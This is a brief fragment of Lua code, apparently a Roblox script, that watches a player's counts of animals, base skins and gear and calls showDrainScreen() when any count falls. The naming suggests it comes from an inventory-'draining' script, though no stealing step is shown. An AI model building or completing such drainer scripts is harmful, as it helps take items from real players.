        if currentAnimalCount < initialAnimalCount 
           or currentBaseSkinCount < initialBaseSkinCount 
           or currentGearCount < initialGearCount then
            showDrainScreen()
            break
        end
    end
end)

end)  -- end of main task.spawn
